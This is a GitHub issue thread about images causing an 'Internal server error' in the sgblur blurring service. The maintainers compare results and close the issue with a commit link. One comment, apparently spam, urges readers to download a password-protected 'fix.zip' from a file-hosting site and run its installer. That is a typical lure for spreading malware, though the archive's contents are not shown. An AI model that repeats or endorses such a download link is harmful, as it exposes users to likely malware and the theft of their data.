### ISSUE TITLE
Image causing "Internal server error"

### ISSUE THREAD

**Issue by PanierAvide** [cquest/sgblur#71]
All details here : https://gitlab.com/panoramax/server/api/-/issues/178

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PanierAvide** [comment]
Other pictures causing similar issues : 
[noirmoutier.zip](https://github.com/user-attachments/files/16977258/noirmoutier.zip)

**Comment by Stefal** [comment]
> Other pictures causing similar issues : [noirmoutier.zip](https://github.com/user-attachments/files/16977258/noirmoutier.zip)

On my own sgblur instance, I can "blur" these images without any problem.

**Comment by PanierAvide** [comment]
My tries were using https://blur.panoramax.openstreetmap.fr/blur/ webpage, and reported issues from user through Panoramax instance website. I don't think it's general because other pictures pass through... An issue with recent developments deployed but not available on this repo ?

**Comment by cquest** [comment]
fixed by https://github.com/cquest/sgblur/commit/5076bb51ffda45b1f0a33932147429f9a242cd70
